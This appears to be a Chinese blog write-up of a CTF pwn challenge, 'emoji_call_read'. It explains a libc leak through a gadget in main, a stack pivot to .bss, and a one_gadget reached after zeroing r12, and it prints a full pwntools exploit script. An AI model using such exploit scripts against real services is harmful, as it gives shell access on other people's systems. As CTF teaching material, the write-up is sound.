emoji_call_read

已于 2024-06-17 18:09:39 修改
阅读量349 收藏 7
点赞数 3
文章标签: 前端 linux 运维
于 2024-06-16 13:56:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A13837377363/article/details/139719270
版权

这道题我觉得可以记录一下。

主要函数,一样,先考虑怎么泄露libc基址。

但,0x20实在太小,组成不了连续3个ret syscall。

而且文件中也没pop rdi;ret这个gadget,只能另寻他法。

我们注意到:

main函数中的这个gadget就很棒,将rbp-0x10处的东西打印出来,后面再执行vuln。

程序没有PIE,所以直接让rbp去got[puts]+0x10就可以了。

以下是这部分exp:

goal=0x404028
gadget=0x401191
gadget2=0x401213#rbp-0x10
gadget3=0x40119A 
#io.interactive()
bss=elf.bss()+0x300
io.recvuntil(b"Input your context:\n")
payload=b'a'*0x10+p64(goal)+p64(gadget2)
io.send(payload)
puts=u64(io.recv(6).ljust(8,b'\x00'))
print('puts:',hex(puts))
libc_base=puts-libc.sym['puts']
print('libc_base:',hex(libc_base))
system=libc_base+libc.sym['system']
bsh=libc_base+next(libc.search(b'/bin/sh\x00'))

泄露完基址,它会再执行vuln,我们就要考虑怎么getshell了。

一开始我打算直接用one_gadget,但全试了一遍,都不可以。

read 0x20,意味着即使我们栈迁移也执行写2个gadget,不行,处理rdi然后system起码也要三个。

说实话,我一开始想把栈迁移到got[puts]附近,

然后:

payload=b'/bin/sh\x00'+p64(system)+p64(0)+p64(gadget2)

将puts的got表覆盖成system,然后bsh会赋给rdi,成功getshell。

但是执行后会在system内部崩溃,是在push r15的位置。

一开始我还以为是因为覆盖了got表里面比较重要的数据,后来发现就是不能直接system,要用系统调用,无论如何这个方法是不行的,我们换一个。

当时想着起码控制连续3个gadget,发现可以在bss上这么构造:
 

contentaddress
0x401191(read()+leave,ret)
bss-0x20bss
ret3
ret2
ret1
........bss-0x20
.........
..........

这样就可以实现连续执行3个可以控制的gadget了。

一开始我中规中矩,

p64(rdi)+p64(bsh)+p64(system)

很可惜依然报错,看来就是system不能用。

现在想着这么系统调用,但是系统调用要的连续执行空间可就多了,很难构造。

所以反过来想能不能用比较少的gadget满足one_gadget的执行条件。

 经过反复对比,锁定了这个gadget,看看条件,rbp可以控制在bss上,肯定可写,bss上根本没什么数据,[rbp-0x70]=NULL也是轻而易举,那就剩下r12==NULL这个了,正好我们可以连续写3个gadget,那答案就呼之欲出了:
 

payload=p64(r12)+p64(0)+p64(one_gadget)

以下是完整exp:

from pwn import *
from LibcSearcher import *
from ctypes import *
elf=ELF('./pwn')
#io=remote('emoji.dayi.ink',22857)
io=process('./pwn')
context.arch='amd64'
libc=ELF('./libc.so.6')
#libc=elf.libc
goal=0x404028
gadget=0x401191
gadget2=0x401213#rbp-0x10
gadget3=0x40119A 
#io.interactive()
bss=elf.bss()+0x300
io.recvuntil(b"Input your context:\n")
payload=b'a'*0x10+p64(goal)+p64(gadget2)
io.send(payload)
puts=u64(io.recv(6).ljust(8,b'\x00'))
print('puts:',hex(puts))
libc_base=puts-libc.sym['puts']
print('libc_base:',hex(libc_base))
system=libc_base+libc.sym['system']
bsh=libc_base+next(libc.search(b'/bin/sh\x00'))
io.recvuntil(b"Input your context:\n")
payload=b'a'*0x10+p64(bss)+p64(gadget)
io.send(payload)
rdi=libc_base+0x2a3e5
rdx2=libc_base+0x11f2e7
leave=0x4011AD#gadget
ret=0x40122F
r12=libc_base+0x35731
rax=libc_base+0x45eb0
one_gadget=libc_base+0xebd38
payload=p64(0)+p64(one_gadget)+p64(bss-0x20)+p64(gadget)
io.send(payload)
payload=p64(ret)+p64(system)+p64(bss-0x20)+p64(r12)
io.send(payload)
io.interactive()

要注意的是发送一定要用send,不能sendline,不然会崩溃报错,读不进去数据,我也不知道为什么,很神奇,以前貌似遇到过。 

--------------------------------------------------------------------------------------------------------------------------------

之前有个判断有误,补充一下,这道其实可以用system

不过要把栈迁移到bss+0x700左右最好,同时由于只能写3个gadget,要调整好迁移的位置,让system正好和0x10对齐。

以下是原因:

这是报错时的截图,在system内部,这个程序的bss是0x404040开始,我迁移到了bss+0x500,但是system内部执行到这的时候,rsp已经是0x404188了,system少说已经占了0x300的空间,这还没执行完,所以如果你迁移到bss+0x200,bss+0x300这样,执行的数据会覆盖bss下方的 got表,甚至rodata这样的不可写区域,自然会报错,所以下次在BSS上执行system的时候,记得把栈迁移得高一点,或者直接系统调用。

奇怪的轩轩
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ios emoji_为iOS构建SwiftUI + Core ML Emoji Hunt游戏
weixin_26638123的博客
07-25 470
ios emojiThe advent of machine learning on mobile has opened doors for a bunch of new opportunities. While it has allowed ML experts to tap into the mobile space, the other end of that equation is act...
Wordle_1.0
热门推荐
yyf525的博客
05-29 8万+
目录 一:前言 二:玩法 1.游戏 2.查看记录 3.排词器 三:游戏模块 1.游戏主界面 2.查看记录 3.排词器 4:源码 5:结语 一:前言 看到最近网上出了一个比较火的Wordle小游戏,自己也写了一个,挽起来效果也不错,希望大家喜欢。 二:玩法 首先需要引用到新更新的game_2.0​​​​​​ 运行之后会出现四个选...
Python_词云
JCMLSY的博客
04-19 779
Python_词频统计与词云词频统计词云四行代码生成一个词云美化词云 以下内容需要用到的包:jieba wordcloud 词频统计 词云 整理自哔哩哔哩视频(加了一点点个人的修改) 四行代码生成一个词云 import wordcloud # 导入词云制作第三方库wordcloud w = wordcloud.WordCloud() # 创建词云对象,赋值给w,现在w就表示了一个词云对象 w.g...
Python学习_100Days
不知名网友的文章
12-06 325
第16-20天--Python进阶数据机构和算法引言排序算法(选择、冒泡和归并)和查找算法(顺序和折半)排序算法使用生成式(推导式)语法嵌套的列表heapq、itertools等的用法collection工具下的模块类常用算法 数据机构和算法 引言 算法:解决问题的方法和步骤 评价算法的好坏:渐进时间复杂度和渐进空间复杂度 渐进时间复杂度的大O标记: 常量时间复杂度-布隆过滤器/哈希存储 对数...
snapchat中国使用_如何使用Snapchat:发送快照和消息的基础
culunyi0802的博客
09-08 6892
snapchat中国使用I love Snapchat, but I’d also be the first to admit the user interface design is…poor.If you’re using Snapchat for the first time and just feel lost, here are the basics. 我喜欢Snapchat,但我也...
python画表情代码_Python selenium send_keys表情符号支持
weixin_39837207的博客
12-09 871
我正在尝试使用selenium的send_keys将表情符号字符发送到带有以下python代码的文本框中.browser = webdriver.Chrome(chrome_options=options)browser.get("https://www.google.co.in")time.sleep(5)working = browser.find_element_by_id('lst-ib'...
libdvm_issue.txt
llrraa2010的专栏
12-23 4481
d:/linux/linuxkernel/WORKING_DIRECTORY/android-omap-20111108-gingerbread/dalvik/vm/Jni.c:1858:13: error: conflicting types for 'GetVersion' c:\mingw-4.6.1\bin\../lib/gcc/mingw32/4.6.1/../../../../inc
java inputstream read_一文让你读懂JAVA.IO、字符编码、URL和Spring.Resource
weixin_39922749的博客
11-22 74
作者:clswcl链接:https://juejin.im/post/6856266775022174222来源:掘金1 http://JAVA.IO字节流inputstream.pngLineNumberInputStream和StringBufferInputStream官方建议不再使用,推荐使用LineNumberReader和StringReader代替ByteArrayInputStre...
Android逆向安全-无侵入找关键call之trace日志分析大法
大星星的专栏
01-07 3084
标题 找关键call是逆向的基本技能和分析目标,找到关键call后便可以进一步利用。在安卓App的逆向分析中,人肉逆向分析虽说不难,但是繁琐,特别是现在App体积动辄几十MB甚至几百MB,反编译出的jar或者smali文件相当多,找关键call无疑是大海捞针。 那么有什么方法可以快速找关键call呢? 之前介绍过两个方法: 一个是插桩日志分析法,一个是借助加固的方法。 插桩日志分析法,理解起来比较...
emoji_picker:一个Flutter软件包,提供Emoji键盘小部件
02-05
主要特点查看并选择390个表情符号8类(可选)添加关键字以推荐表情符号材料设计和库比蒂诺模式无法显示的表情符号被滤除(仅限Android)用法要使用此插件,请在您的pubspec.yaml文件中将emoji_picker添加为依赖项。...
flutter_emoji_keyboard:在flutter框架中仅用于表情符号的键盘
04-17
emoji_keyboard 可以输入表情符号的键盘入门该项目是Flutter应用程序的起点。 如果这是您的第一个Flutter项目,那么有一些资源可以帮助您入门:要获得Flutter入门方面的帮助,请查看我们的,其中提供了教程,示例,...
Emoji__Rating
03-06
表情符号评分量表演示链接: : Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新...
emoji_calculator_swift
03-31
emoji_calculator_swift
emoji_replacer
05-14
emoji_replacer chrome扩展程序,可在html中添加表情符号。如果按原样使用它,可能会有很多问题。
日常工作记录目录
最新发布
与海
06-21 157
EasyExcel实现二维码下载与展示
webClient + fastJSON2 获取json格式的数据,同时解析至java class 并 下划线转驼峰
qq_46662528的博客
06-17 298
决定返回值是什么格式一般情况可以不写,但这里要获取JSON格式的。可以将JSON和java的class属性自动进行匹配。webClient中。fastJSON2中。
【尚庭公寓SpringBoot + Vue 项目实战】后台用户信息管理(十七)
小林的博客
06-18 983
用户的密码通常不会直接以明文的形式保存到数据库中,而是会先经过处理,然后将处理之后得到的"密文"保存到数据库,这样能够降低数据库泄漏导致的用户账号安全问题。
netcore 生成验证码
qq_51172697的博客
06-20 299
提供一个生成验证码和校验的接口。
@staticmethod async def emojis_create(guild_to: discord.Guild, guild_from: discord.Guild): emoji: discord.Emoji emojis_created = len(guild_from.emojis) for emoji in guild_from.emojis: try: await asyncio.sleep(0.2) emoji_image = await emoji.url.read() await guild_to.create_custom_emoji(name=emoji.name, image=emoji_image) logs(f"Created Emoji {emoji.name}", 'add') except discord.Forbidden: logs(f"Error While Creating Emoji {emoji.name} ", 'error') except discord.HTTPException: logs(f"Error While Creating Emoji {emoji.name}", 'error') logs(f"Created Emojis: {emojis_created}", 'add', True)
06-03
这是一个Python中的静态方法,用于在Discord服务器中从一个服务器复制自定义表情到另一个服务器。它需要两个Discord服务器作为参数:`guild_to`和`guild_from`。它首先获取`guild_from`中的所有自定义表情,并在`guild_to`中创建相同名称和图像的自定义表情。如果成功创建,则记录创建的自定义表情数量,并返回。如果在创建自定义表情时遇到权限问题或HTTP异常,则记录错误并继续执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值